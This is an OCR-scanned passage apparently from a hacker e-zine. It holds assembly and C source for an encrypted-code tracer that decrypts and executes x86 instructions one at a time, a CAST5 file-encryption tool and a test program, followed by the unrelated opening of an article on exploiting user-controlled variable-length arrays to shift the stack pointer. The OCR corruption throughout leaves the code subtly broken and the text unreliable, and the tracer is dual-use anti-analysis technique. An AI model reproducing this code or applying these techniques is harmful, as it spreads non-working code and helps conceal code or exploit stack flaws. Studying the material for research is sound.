----[ A.1 - The tracer source: crypt_exec.S 


/* 
Copyright (c) 2004 Zeljko Vrba 


Permission is hereby granted, free of charge, to any person obtaining 

a copy of this software and associated documentation files (the 
"Software"), to deal in the Software without restriction, including 
without limitation the rights to use, copy, modify, merge, publish, 
distribute, sublicense, and/or sell copies of the Software, and to permit 
persons to whom the Software is furnished to do so, subject to the 
following conditions: 


The above copyright notice and this permission notice shall be included 
in all copies or substantial portions of the Software. 


HE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
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IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT 
OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR 
THE USE OR OTHER DEALINGS IN THE SOFTWARE. 

*/ 


-text 


[BORK RR KKK KK KR I I A I I RK 
* void *crypt_exec ( 
decrypt_fn_ptr dfn, const void *key, 
const void *lo_addr, const void *hi_addr, 
const void *addr, ...) 
typedef (*decrypt_fn_ptr) ( 
void *key, unsigned char *dst, const unsigned char *src); 


- dfn is pointer to deccryption function 

—- key is pointer to crypt routine key data 

—- addr is the addres wher xecution should begin. due to the way the 
code is decrypted and executed, it MUST be aligned to 8 (BLOCKSIZE) 
bytes!! 
the rest are arguments to called function 


The crypt_exec stops when the stack pointer becomes equal to what it 
was on entry, and executing ’ret’ would cause the called function to 
exit. This works assuming normal C compiled code. 


Returns the value the function would normally return. 


This code calls: 
int xde_disasm(unsigned char *ip, struct xde_instr *outbuf); 


me 


XDE disassembler engine is compiled and used with PACKED structure! 


It is assumed that the encryption algorithm uses 64-bit block size. 
Very good protection could be done if decryption is executed on the 
SMART CARD. 


Some terminology: 

‘Traced’ refers to the original program being executed instruction by 
instruction. The technique used resembles Knuth’s tracing routine (and 
indeed, we get true tracing when decryption is dropped). 


‘Our’ refers to our data stack, etc. 


TODOs and limitations: 
—- some instructions are not emulated (FAR CALL/JMP/RET, RET NEAR imm16) 
— LOOP* and JCXZ opcodes haven’t been tested 


—- _jcec_rel32 has been tested only indirectly by _jcc_rel8 
OK I A A A A I I I I A I OR I I / 


+ + + + + + + + FF FF FF FF FF FF F F F F F FF F FF F F F FF FF F FF F FF FF FF F OF *OF 


/* 
Offsets into xde_instr struct. 

xy 

define OPCODE 23 

define OPCODE2 24 

define MODRM 25 


/* 
Set up our stack and save traced context. The context is saved at the end 
of our stack. 


* / 

#define SAVE_TRACED_CONTEXT \ 
movl %esp, traced_esp a 
movl $stk_end, %esp aN 
pusha a 
pushf 


/* 
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Restore traced context from the current top of stack. After that restores 
traced stack pointer. 


i 

#define RESTORE_TRACED_CONTEXT \ 
popt ra 
popa a 
movl traced_esp, %esp 

/* 


= 


Identity decryption routine. This just copies 8 bytes (BLOCKSIZE) from 
source to destination. Has normal C calling convention. Is not global. 
4 
identity_decrypt: 


movl 8(%esp), %edi /* destination address */ 
movl 12(%esp), %esi /* source address */ 

movl $8, %ecx /* 8 bytes */ 

cld 

rep movsb 

ret 


crypt_exec: 
-globl crypt_exec 
.extern disasm 


/* 
Fetch all arguments. We are called from C and not expected to save 
registers. This is the stack on entry: 


[ ret_addr dfn key lo_addr hi_addr addr ...args ] 
"Sf 
popl %eax /* return address */ 
popl r_decrypt /* veal decryption function pointer */ 
popl key /* encryption key */ 
popl lo_addr /* low traced eip */ 
popl hi_addr /* high traced eip */ 
popl traced_eip /* eip to start tracing */ 
pushl %eax /* put return addr to stack again */ 
/* 


now the stack frame resembles as if inner function (starting at 
traced_eip) were called by normal C calling convention (after return 
address, the vararg arguments folow) 


wy 
movl %esp, end_esp /* this is used to stop tracing. */ 
movl $0, traced_ctr /* reset counter of insns to 0 */ 


decryptloop: 
/* 


This loop traces a single instruction. 


The CONTEXT at the start of each iteration: 
traced_eip: points to the next instruction in traced program 


First what we ever do is switch to our own stack and store the traced 
program’s registers including eflags. 


Instructions are encrypted in ECB mode in blocks of 8 bytes. 
Therefore, we always must start decryption at the lower 8-byt 
boundary. The total of three blocks (24) bytes are decrypted for one 
instruction. This is due to alignment and maximum instruction length 
constraints: if the instruction begins at addres that is congruent 
to 7 mod 8 + 16 bytes maximum length (given some slack) gives 
instruction span of three blocks. 


Yeah, I know ECB sucks, but this is currently just a proof-of 


concept. Design something better for yourself if you need it. 
if 
SAVE_TRACED_ CONTEXT 
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decryptloop_nocontext: 
/* 
This loop entry point does not save traced context. It is used from 
control transfer instruction emulation where we doall work ourselves 
and don’t use traced context. 


The CONTEXT upon entry is the same as for decryptloop. 


First decide whether to decrypt or just trace the plaintext code. 


* 

movl traced_eip, %eax 

movl Sidentity_decrypt, %ebx /* assume no decryption */ 

cmpl lo_addr, %eax 

jb .store_decrypt_ptr /* traced_eip < lo_addr */ 

cmpl hi_addr, %eax 

ja .store_decrypt_ptr /* traced_eip > hi_addr */ 

movl r_decrypt, %ebx /* in bounds, do decryption */ 
.store_decrypt_ptr: 

movl %ebx, decrypt 


/* 
Decrypt three blocks starting at eax, reusing arguments on the stack 
for the total of 3 calls. WARNING! For this to work properly, the 
decryption function MUST NOT modify its arguments! 


*/ 

andl $-8, %eax /* round down traced_eip to 8 bytes */ 
pushl %eax /* src buffer */ 

pushl Sinsn /* dst buffer */ 

pushl key /* key data pointer */ 

call *decrypt /* 1st block */ 

addl $8, 4(%esp) /* advance dst */ 

addl $8, 8(%esp) /* advance src */ 

call *decrypt /* 2nd block */ 

addl $8, 4(%esp) /* advance dst */ 

addl $8, 8(%esp) /* advance src */ 

call *decrypt /* 3rd block */ 

addl $12, %esp /* clear args from stack */ 
/* 


Obtain the real start of instruction in the decrypted buffer. The 
traced eip is taken modulo blocksize (8) and added to the start 
address of decrypted buffer. Then XDE is called (standard C calling 
convention) to get necessary information about the instruction. 


*y, 
movl traced_eip, %eax 

andl $7, %eax /* traced_eip mod 8 */ 

addl Sinsn, %eax /* offset within decrypted buffer */ 
pushl Sdisbuf /* address to disassemble into */ 
pushl %eax /* insn offset to disassemble */ 
call xde_disasm /* disassemble and return len */ 
movl %eax, ilen /* store instruction length */ 
popl %Seax /* decrypted insn start */ 
popl %ebx /* clear remaining arg from stack */ 
/* 

Calculate the offset in control table of the instruction handling 


routine. Non-control transfer instructions are just executed in 
traced context, other instructions are emulated. 


Before executing the instruction, the traced eip is advanced by 
instruction length, and the number of executed instructions is 

incremented. We also append indirect ’jmp *continue’ after the 

instruction, to continue execution at appropriate place in our 

tracing. The JMP indirect opcodes are OxFF 0x25. 


el 

movl ilen, %ebx 

addl %tebx, traced_eip /* advance traced eip */ 
incl traced_ctr /* increment counter */ 
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movw SOx25FF, (%eax, %ebx) /* JMP indirect; little-endian! */ 

movl Scontinue, 2(%eax, %ebx) /* store address */ 

movzbl OPCODE+disbuf, %esi /* load instruction byte */ 

jmp *control_table(,%esi, 4) /* execute by appropirate handler */ 

-data 

pk 

Emulation routines start here. They are in data segment because cod 
segment isn’t writable and we are modifying our own code. We don’t 
want yet to mess around with mprotect(). One day (non-exec page tabl 


support on x86-64) it will have to be done anyway.. 


The CONTEXT upon entry on each emulation routine: 


eax : start of decrypted (CURRENT) insn addr to execute 
ilen : instruction length in bytes 
stack top -> [traced: eflags edi esi ebp esp ebx edx ecx eax] 
traced_esp : original program’s esp 
traced_eip : eip of next insn to execute (NOT of CURRENT insn!) 
mf 

_—unhandled: 
/* 


Unhandled opcodes not normally generated by compiler. Once proper 
emulation routine is written, they become handled :) 


Executing privileged instruction, such as HLT, is the easiest way to 
terminate the program. teax holds the address of the instruction we 
were trying to trace so it can be observed from debugger. 

a 
hit 


_nonjump: 
/* 
Common emulation for all non-control transfer instructions. 
Instruction buffer (insn) is already filled with decrypted blocks. 


Decrypted instruction can begin in the middle of insn buffer, so the 
relative jmp instruction is adjusted to jump to the traced insn, 
skipping /’junk’ at the beginning of insn. 


When the instruction is executed, our execution continues at location 
where /’/continue’ points to. Normally, this is decryptloop, but 
occasionaly it is temporarily changed (e.g. in _grp5). 


x 
subl Sinsn, %eax /* insn begin within insn buffer */ 
movb %al, .executet+l /* update jmp instruction */ 
RESTORE_TRACED_CONTEXT 
-execute: 
jmp insn /* relative, only offset adjusted */ 
insn: 


-fill 32, 1, 0x90 


_jcec_rel8: 
/* 
Relative 8-bit displacement conditional jump. It is handled by 
relative 32-bit displacement jump, once offset is adjusted. Opcode 
must also be adjusted: short jumps are 0x70-Ox7F, long jumps are Ox0F 


Ox80-Ox8F. (conditions correspond directly). Converting short to long 
jump needs adding 0x10 to 2nd opcode. 

*ef 

movsbl 1(%eax), %Sebx /* load sign-extended offset */ 

movb (%eax), %cl /* load instruction */ 

addb $0x10, %cl /* adjust opcode to long form */ 


/* drop processing to _jcc_rel32 as 32-bit displacement */ 


_jcec_rel32: 
/* 


Emulate 32-bit conditional relative jump. We pop the traced flags, 
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let the Jcc instruction execute natively, and then adjust traced eip 
ourselves, depending whether Jcc was taken or not. 


CONTEXT: 

ebx: jump offset, sign-extended to 32 bits 

cl : real 2nd opcode of the instruction (lst is Ox0F escape) 

*/ 
movb %cl, ._jcc_re1l32_insn+1 /* store opcode to instruction */ 
popft /* restore traced flags */ 


.-_jcc_re1l32_insn: 


Explicit coding of 32-bit relative conditional jump. It is executed 
with the traced flags. Also the jump offset (32 bit) is supplied. 


fs 
-byte Ox0F, 0x80 
-long ._jcc_rel32_true - ._jcc_rel32_false 


-_jcc_re132_false: 
/* 
The Jcc condition was false. Just save traced flags and continue to 
next instruction. 
ak 
pusht 
jmp decryptloop_nocontext 


-_jcc_rel32_true: 
/* 
The Jcc condition was true. Traced flags are saved, and then the 
execution falls through to the common eip offset-adjusting routine. 
x7 
pushft 


rel_offset_fixup: 
/* 
Common entry point to fix up traced eip for relative control-flow 
instructions. 


CONTEXT: 

traced_eip: already advanced to the would-be next instruction. this 
is done in decrypt_loop before transferring control to 
any insn-handler. 

ebx : sign-extended 32-bit offset to add to eip 

+f, 

addl %tebx, traced_eip 

jmp decryptloop_nocontext 


_retn: 
/* 
Near return (without imml16). This is the place where th nd-of 
trace condition is checked. If, at this point, esp equals end_esp, 


this means that the crypt_exec would return to its caller. 
*f 
movl traced_esp, %ebp /* compare curr traced esp to esp */ 
cmpl sebp, end_esp /* when crypt_exec caller’s return */ 
je ._endtrace /* address was on top of the stack */ 
/* 
Not equal, emulate ret. 
*/ 
movl sesp, %sebp /* save our current stack */ 
movl traced_esp, %esp /* get traced stack */ 
popl traced_eip /* pop return address */ 
movl %esp, traced_esp /* write back traced stack */ 
movl sebp, %sesp /* restore our current stack */ 


jmp decryptloop_nocontext 


.-_endtrace: 
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Here the traced context is completely restored and RET is executed 
natively. Our tracing routine is no longer in control after RET. 
Regarding C calling convention, the caller of crypt_exec will get 
the return value of traced function. 


One detail we must watch for: the stack now looks like this: 


stack top -> [ ret_addr ...args ] 


but we have been called like this: 


stack top -> [ ret_addr dfn key lo_addr hi_addr addr ...args ] 


and this is what compiler expects when popping arg list. So we must 
fix the stack. The stack pointer can be just adjusted by -20 instead 
of reconstructing the previous state because C functions are free to 
modify their arguments. 


CONTEXT: 
ebp: current traced esp 
*y 
movl (%ebp), %ebx /* return address */ 
subl $20, %ebp /* fake 5 extra args */ 
movl %ebx, (%ebp) /* put ret addr on top of stack */ 
movl %ebp, traced_esp /* store adjusted stack */ 
RESTORE_TRACED_CONTEXT 
ret /* veturn without regaining control */ 


/* 
LOOPNE, LOOPE and LOOP instructions are executed from the common 
handler (_doloop). Only the instruction opcode is written from 
separate handlers. 


28 is the offset of traced ecx register that is saved on our stack. 
*f 
_loopne: 
movb SOxEO, ._loop_insn /* loopne opcode */ 
jmp ._doloop 
_loope: 
movb $OxE1, ._loop_insn /* loope opcode */ 
jmp ._doloop 
_loop 
movb $0xE2, ._loop_insn /* loop opcode */ 
doloop: 
/* 


* Get traced context that is relevant for LOOP* execution: signed 
* offset, traced ecx and traced flags. 
*/ 

movsbl 1(%eax), %ebx 

movl 28(%esp), %ecx 


popf 


._loop_insn: 
/* 


Explicit coding of loop instruction and offset. 


.byte OxE0 /* LOOP* opcodes: EO, El, E2 */ 
-byte ._loop_insn_true - ._loop_insn_false 


._loop_insn_false: 

/* 

LOOP* condition false. Save only modified context (flags and ecx) 
and continue tracing. 

*/ 

pusht 

movl %ecx, 28(%esp) 

jmp decryptloop_nocontext 
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._loop_insn_true: 


/* 


21 


LOOP* condition true. Save only modified context, and jump to the 


rel_offset_fixup to fix up traced eip. 
*/ 
pusht 
movl %ecx, 28(%esp) 
jmp rel_offset_fixup 


JCxzZs 
/* 
JCXZ. This is easier to simulate than to natively execute. 
ir 6 
movsbl 1(%eax), %ebx /* get signed offset */ 
empl $0, 28(%esp) /* test traced ecx for 0 */ 
jz rel_offset_fixup /* if so, fix up traced EIP */ 


jmp decryptloop_nocontext 


_callrel: 
/* 
Relative CALL. 
Bf, 
movb $1, %cl /* 1 to indicates relative call */ 
movl 1(%eax), %ebx /* get offset */ 
_call: 
/* 
CALL emulation. 
CONTEXT: 
cl : relative/absolute indicator. 
ebx: absolute address (cl==0) or relative offset (cl!=0). 
sy 
movl sesp, *sebp /* save our stack */ 
movl traced_esp, %esp /* push traced eip onto */ 
pushl traced_eip /* traced stack */ 
movl %esp, traced_esp /* write back traced stack */ 
movl sebp, *sesp /* restore our stack */ 
testb Scl, %cl /* if not zero, then it is a */ 
jnz rel_offset_fixup /* relative call */ 
movl %ebx, traced_eip /* store dst eip */ 
jmp decryptloop_nocontext /* continue execution */ 
_jmp_rels: 
/* 
Relative 8-bit displacement UMP. 
ip 
movsbl 1(%eax), %ebx /* get signed offset */ 


jmp rel_offset_fixup 


_jmp_rel32: 
/* 
Relative 32-bit displacement JUMP. 
*/ 
movl 1(%eax), %ebx /* get offset */ 


jmp rel_offset_fixup 


This is the case for OxFF opcode which 
instruction opcode is hidden in bits 5, 


escapes to GRP5: the real 
4, and 3 of the modR/M byte. 


efi 

movb MODRM+disbuf, %bl /* get modRM byte */ 

shr $3, %bl /* shift bits 3-5 to 0-2 */ 
andb $7, %bl /* and test only bits 0-2 */ 
cmpb $2, %bl /* < 2, not control transfer */ 


jb _nonjump 
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cmpb $5, %bl /* > 5, not control transfer */ 
ja _nonjump 

cmpb $3, %bl /* CALL FAR */ 

je _unhandled 

empb $5, %bl /* JMP FAR */ 

je _unhandled 

movb %bl, %dl /* for future reference */ 

/* 

modR/M equals 2 or 4 (near CALL or JMP). 


In this case the reg field of modR/M (bits 3-5) is the part of 
instruction opcode. 


Replace instruction byte OxFF with 0x8B (MOV r/m32 to reg32 opcode). 
Replace reg field with 3 (ebx register index). 


movb $0x8B, (%eax) /* replace with MOV_to_reg32 opcode */ 
movb 1(%eax), Sbl /* get modR/M byte */ 

andb $0xC7, %bl /* mask bits 3-5 */ 

orb $0x18, %bl /* set them to 011=3: ebx reg index */ 
movb %bl, 1(%eax) /* set MOV target to ebx */ 


/* 

We temporarily update continue location to continue execution in 
this code instead of jumping to decryptloop. We execute MOV in TRACED 
context because it must use traced registers for address calculation 
Before that we save OUR esp so that original TRACED context isn’t 
lost (MOV updates ebx, traced CALL wouldn’t mess with any registers). 


First we save OUR context, but after that we must restore TRACED ctx. 
In order to do that, we must adjust esp to point to traced context 


before restoration. 

xy 
movl $._grp5_continue, continue 
movl %esp, %ebp /* save traced context pointer into ebp */ 
pusha /* store our context; eflags irrelevant */ 
movl %esp, our_esp /* our context pointer */ 
movl %ebp, %esp /* adjust traced context pointer */ 


jmp _nonjump 


-_grp5_continue: 
/* 
This is where execution continues after MOV calculates effective 
address for us. 


CONTEXT upon entry: 
ebx: target address where traced execution should continue 
dl: opcode part (bits 3-5) of modR/M, shifted to bits 0-2 


A 
movl Sdecryptloop, continue /* restore continue location */ 
movl our_esp, %esp /* restore our esp */ 
movl %ebx, 16(%esp) /* so that ebx is restored anew */ 
popa /* our context along with new ebx */ 
cmpb $2, %dl1 /* CALL near indirect */ 
je ._grp5_call 
movl %ebx, traced_eip /* JMP near indirect */ 
jmp decryptloop_nocontext 

-_grp5_call: 
xorb Scl, %cl /* mark: addr in ebx is absolute */ 
jmp _call 

_Oxf: 
/* 


OxOF opcode esacpe for two-byte opcodes. Only OF O0Ox80-0x8F range are 
Jcc rel32 instructions. Others are normal instructions. 

*/ 

movb OPCODE2+disbuf, %cl /* extended opcode */ 

empb $0x80, %cl 
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jb _nonjump /* < 0x80, not Jcc */ 
cmpb SOx8F, %cl 

ja _nonjump /* > Ox8F, not Jcc */ 
movl 2(%eax), %ebx /* load 32-bit offset */ 


jmp _jcc_rel32 


control_table: 
/* 
This is the jump table for instruction execution dispatch. When the 
real opcode of the instruction is found, the tracer jumps indirectly 
to execution routine based on this table. 


*/, 
.cept Ox0F /* 0x00 - Ox0E */ 
. long _nonjump /* normal opcodes */ 
.endr 
.long _Oxf /* OxOF two-byte escape */ 
.cept 0x60 /* 0x10 - Ox6F */ 
.long _nonjump /* normal opcodes */ 
-endr 
.rept 0x10 /* 0x70 - Ox7F */ 
.long _jcc_rel8 /* relative 8-bit displacement */ 
.endr 
.rept 0x10 /* 0x80 - Ox8F */ 
. long _nonjump /* long displ jump handled from */ 
.endr /* _Oxf opcode escape */ 
.rept Ox0A /* 0x90 - 0x99 */ 
.long _nonjump 
-endr 
-long _unhandled /* Ox9A: far call to full pointer */ 
.cept 0x05 /* Ox9B - Ox9F */ 
.long _nonjump 
-endr 
.rept 0x20 /* OxAO - OxBF */ 
.long _nonjump 
-endr 
.long _nonjump, _nonjump /* OxCO, OxCl */ 
.long _unhandled /* OxC2: retn imml6 */ 
.long _retn /* OxC3: retn */ 
.rept 0x06 /* OxC4 - 0xc9 */ 
.long _nonjump 
-endr 
.long _unhandled, _unhandled /* OxCA, OxCB : far ret */ 
.rept 0x04 
.long _nonjump 
-endr 
.rept 0x10 /* OxDO - OxDF */ 
-long _nonjump 
endr 
ong _loopne, _loope /* OxEO, OxEl */ 
-long _loop, _jcxz /* OxE2, OxE3 */ 
.rept 0x04 /* OxE4 -— OxE7 */ 
.long _nonjump 
.endr 
.long _callrel /* OxE8 */ 
.long _jmp_rel32 /* OxEQ */ 
.long _unhandled /* far jump to full pointer */ 
.long _jmp_re18 /* OXEB */ 
.rept 0x04 /* OxEC -— OxEF */ 
.long _nonjump 
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.rept Ox0F /* OxFO - OxFE */ 

.long _nonjump 

.endr 

-long _grp5 /* OxFF: group 5 instructions */ 
-data 
continue: -long decryptloop /* where to continue after 1 insn */ 
-bss 
-align 4 
traced_esp: .long 0 /* traced esp */ 
traced_eip: .long 0 /* traced eip */ 
traced_ctr: .long 0 /* incremented by 1 for each insn */ 
lo_addr: .long 0 /* low encrypted eip */ 
hi_addr: .long 0 /* high encrypted eip */ 
our_esp: .long 0 /* our esp... */ 
end_esp: .long 0 /* esp when we should stop tracing */ 
local_stk: .fill 1024, 4, 0O /* local stack space (to call C) */ 
stk_end = . /* we need this... */ 
ilen: .long 0 /* instruction length */ 
key: .long 0 /* pointer to key data */ 
decrypt: -long 0 /* USED decryption function */ 
r_decrypt: -long 0 /* REAL decryption function */ 
disbuf: efi 4E28 7 15-*0 /* xde disassembly buffer */ 
----[ A.2 - The file encryption utility source: cryptfile.c 
/* 


Copyright (c) 2004 Zeljko Vrba 


Permission is hereby granted, free of charge, to any person obtaining 

a copy of this software and associated documentation files (the 
"Software"), to deal in the Software without restriction, including 
without limitation the rights to use, copy, modify, merge, publish, 
distribute, sublicense, and/or sell copies of the Software, and to permit 
persons to whom the Software is furnished to do so, subject to the 
following conditions: 


he above copyright notice and this permission notice shall be included 
in all copies or substantial portions of the Software. 


PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
RCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
O EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 

M, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT 
R OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR 
HE USE OR OTHER DEALINGS IN THE SOFTWARE. 
/ 


C5 


*+HOQH gs Ft 
| 34 
> 
OHEZ 


* This program encrypts a portion of the file, writing new file with 
* .crypt appended. The permissions (execute, et al) are NOT preserved! 
* The blocksize of 8 bytes is hardcoded. 
xf 
#include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <errno.h> 
include "cast5.h" 


define BLOCKSIZE 8 
define KEYSIZE 16 
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typedef void (*cryptblock_f) (void*, u8*, const u8*); 


static unsigned char *decode_hex_key(char *hex) 


{ 


static unsigned char key[KEYSIZE]; 
int i; 


if (strlen(hex) != KEYSIZE << 1) { 

fprintf(stderr, "KEY must have EXACTLY %d hex digits.\n", 
KEYSIZE << 1); 
exit (1); 


} 


for(i = 0; i < KEYSIZE; i++, hex += 2) { 
unsigned int x; 
char old = hex[2]; 


hex[2] = 0; 

if (sscanf (hex, "%02x", &x) != 1) { 
fprintf(stderr, "non-hex digit in KEY.\n"); 
exit(l1); 

} 

hex[2] = old; 

key[i] = x; 


} 


return key; 


} 


static void *docrypt ( 
FILE *in, FILE *out, 
long startoff, long endoff, 
cryptblock_f crypt, void *ctx) 


char buf [BLOCKSIZE], enc[BLOCKSIZE]; 
long curroff = 0; 
size_t nread = 0; 


while((nread = fread(buf, 1, BLOCKSIZE, in)) > 0) { 
long diff = startoff - curroff; 


if((diff < BLOCKSIZE) && (diff > 0)) { 


/* 
this handles the following mis-alignment (each . is 1 byte) 
bpd [rept gadeess lee te 
Sn “ curoff+BLOCKSIZE 
| startoff 
currofft 
a 


Lt(fwrite (but, 1 avit; out) -<-dite): - { 
perror("fwrite"); 
ext); 
} 
memmove (buf, buf + diff, BLOCKSIZE - diff); 
fread(buf + BLOCKSIZE - diff, 1, diff, in); 


curroff = startoff; 

} 

if((curroff >= startoff) && (curroff < endoff)) { 
crypt (ctx, enc, buf); 

} else { 


memcpy (enc, buf, BLOCKSIZE) ; 


} 

if (fwrite(enc, 1, nread, out) < nread) { 
perror("fwrite"); 
exit(1); 
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curroff += nread; 


int main(int argc, char **argv) 


{ 


FILE *in, *out; 

long startoff, endoff; 
char outfname[256]; 
unsigned char *key; 
struct cast5_ctx ctx; 
cryptblock_f mode; 


if(arge != 6) { 
fprintf(stderr, "USAGE: %s <-e|-d> FILE KEY STARTOFF ENDOFF\n", 
argv[0]); 
fprintf(stderr, "KEY MUST be 32 hex digits (128 bits).\n"); 
return 1; 


} 


if('strcemp(argv[1l], "-e")) { 
mode = cast5_encrypt; 
} else if(!strcemp(argv[1], "-d")) { 
mode = cast5_decrypt; 
} else { 
fprintf(stderr, "invalid mode (must b ither od -d)\n"); 


return 1; 


} 


startoff = atol(argv[4]); 
endoff = atol(argv[5]); 
key = decode_hex_key(argv[3]); 


if (cast5_setkey(&ctx, key, KEYSIZE) < 0) { 
fprintf(stderr, "error setting key (maybe invalid length) \n"); 
return 1; 


} 


if ((endoff - startoff) & (BLOCKSIZE-1)) { 


fprintf(stderr, "STARTOFF and ENDOFF must span an exact multiple" 


"of Sd bytes\n", BLOCKSIZE) ; 
return 1; 
} 
if((endoff - startoff) < BLOCKSIZE) { 
fprintf(stderr, "STARTOFF and ENDOFF must span at least" 
" $d bytes\n", BLOCKSIZE) ; 


return, 1; 

} 

sprintf (outfname, "%SSs.crypt", argv[2]); 

if(!(in = fopen(argv[2], "r"))) { 
fprintf(stderr, "fopen(%s): s\n", argv[2], strerror(errno)); 
return 1; 

} 

if(! (out = fopen(outfname, "w"))) { 
fprintf(stderr, "fopen(%s): s\n", outfname, strerror(errno)); 
return 1; 


} 
docrypt (in, out, startoff, endoff, mode, &ctx); 
fclose(in); 


fclose (out); 
return 0; 


----[ A.3 - The test program: test2.c 
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/* 
Copyright (c) 2004 Zeljko Vrba 


Permission is hereby granted, free of charge, to any person obtaining 

a copy of this software and associated documentation files (the 
"Software"), to deal in the Software without restriction, including 
without limitation the rights to use, copy, modify, merge, publish, 
distribute, sublicense, and/or sell copies of the Software, and to permit 
persons to whom the Software is furnished to do so, subject to the 
following conditions: 


he above copyright notice and this permission notice shall be included 
in all copies or substantial portions of the Software. 


THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 
XPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
N 


RCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 


O EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 

M, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT 
R OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR 
THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
/ 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
1 
1 


include <unistd.h> 
include "cast5.h" 


define BLOCKSIZE 8 
define KEYSIZE 16 


/* 
* fl and f2 are encrypted with the following 128-bit key: 
* 5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of the string ’password’ ) 
*/ 


static int fl(int a) 


{ 


$n: 1; 3 <= ".0 


for(i = 0; i < a; itt) { 
StS i Aiy 
} 
printf ("called plaintext code: f1 = %d\n", a); 
return s; 


} 
static int f2(int a, int b) 


ine 17 


return a; 


} 


static unsigned char *decode_hex_key(char *hex) 


{ 


static unsigned char key[KEYSIZE]; 
int i; 


if (strlen(hex) != KEYSIZE << 1) { 
fprintf(stderr, "KEY must have EXACTLY %d hex digits.\n", 
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KEYSIZE << 1); 
exit (1); 


} 


for(i = 0; i < KEYSIZE; 
unsigned int x; 
char old = hex[2]; 


ea 
ae 
ue 
s 
De 
0) 
x 
2h 
ll 
i) 


hex[2] = 0; 


if (sscanf (hex, "%02x", &x) != 1) { 
fprintf(stderr, "non-hex digit in KEY.\n"); 
exit(1); 

} 

hex[2] = old; 

key[i] = x; 


} 


return key; 


int main(int argc, char **argv) 


int a, b, result; 

char op[16], hex[256]; 
void *esp; 

struct cast5_ctx ctx; 


printf("enter decryption key: "); 

scanf("$255s", hex); 

if (cast5_setkey (&ctx, decode_hex_key (hex), KEYSIZE) < 0) { 
fprintf(stderr, "error setting key.\n"); 
return 1; 


} 


printf("a b = "); scanf("Sd Sd", &a, &b); 
asm("movl %%esp, 30" : "=m" (esp)); 


printf ("esp=%p\n", esp); 
result = crypt_exec(cast5_decrypt, &ctx, £1, decode_hex_key, 


£2, a, b); 
asm("movl %%esp, 30" : "=m" (esp)); 
printf ("esp=%p\n", esp); 
printf ("result = Sd\n", result); 


return 0; 
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--[{ 1 - Introduction 


The paper documents a rare, but none-the less interesting bug in 
variable sized arrays in C. This condition appears when a user 
supplied length is passed via a parameter to a variable 
declaration in a function. 


As a result of this, an attacker may be able to "shift" the stack 
pointer to point it to somewhere unexpected, such as above 

the stack pointer, or somewher lse like the Global Offset 
Table. 


--[ 2 - The story 


After playing a couple rounds of pool and drinking at a local 
pub, nemo talked about some of the fruits after the days auditing 
session. He mentioned that there was some interesting code 
constructs which he hadn’t fully explored yet (perhaps because 

I dragged him out drinking). 


Basically, the code vaguely looked like: 


int function(int len, some_other_args) 
{ 

int a; 

struct whatever *b; 

unsigned long c[len]; 


if(len > SOME DEFINE) { 


return ERROR; 


} 


/* vest of the code */ 
} 


and we started discussing about that, and how we could take 
advantage of that. After various talks about the compiler emitting 
code that wouldn’t allow it, architectures that it’d work on (and 
caveats of those architectures), and of course, another round or 
two drinks, we came to the conclusion that it’d be perfectly 
feasible to exploit, and it would be a standard esp -= 
user_supplied_value; 


The problem in the above code, is that if len is user-supplied 

it would be possible to make it negative, and move the stack 
pointer move closer to the top of the stack, as opposed to closer 
to the bottom (assuming the stack grows down.) 
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-—---[ 2.1 - C99 standard note 


The C99 standard allows for variable-length array declaration: 


[To quote, 


"In this example, the size of a variable-length array is computed 
and returned from a function: 


size_t fsize3 (int n) 

{ 
char b[n+3]; //Variable length array. 
return sizeof b; // Execution timesizeof. 


} 


int main() 

{ 
size_t size; 
size = fsize3(10); // fsize3 returns 13. 
return 0; 


a 
--[ 3 - Break down 


Here is the (convoluted) C file we’ll be using as an example. 
We’1l cover more things later on in the article. 


include <stdlib.h> 
include <unistd.h> 
include <stdio.h> 
include <string.h> 
include <sys/types.h> 


int func(int len, char *stuff) 


char x[len]; 


printf ("sizeof(x): %d\n", sizeof (x)); 
strncpy(x, stuff, 4); 
return 58; 


} 


int main(int argc, char **argv) 
{ 


return func(atoi(argv[1]), argv[2]); 


} 


The question arises though, what instructions does the compiler 
generate for the func function? 


Here is the resulting disassembly from "gcc version 3.3.5 
(Debian 1:3.3.5-8ubuntu2)", gcc dmeiswrong.c -o dmeiswrong. 


080483f4 <func>: 
80483f4: 55 push sebp 
80483f5: 89 e5 mov sesp,sebp ; standard function 
7 prologue 
80483f7: 56 push sesi 
80483f8: 53 push sebx ; preserve the appropriate 
; register contents. 
80483£9: 83 ec 10 sub $0x10,%esp ; setup local 
; variables 
80483fc: 89 e6 mov sesp,sesi ; preserve the esp 
; register 
80483fe: 8b 55 08 mov 0x8 (sebp),%edx ; get the length 
8048401: 4a dec Sedx ; decrement it 
8048402: 8d 42 O1 lea Oxl (Sedx),%eax ; eax = edx + 1 
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8048405: 83 cO Of add SOxf, seax 
8048408: cl e8 04 shr SOx4, eax 
804840b: cl e0 04 shl SOx4, eax 
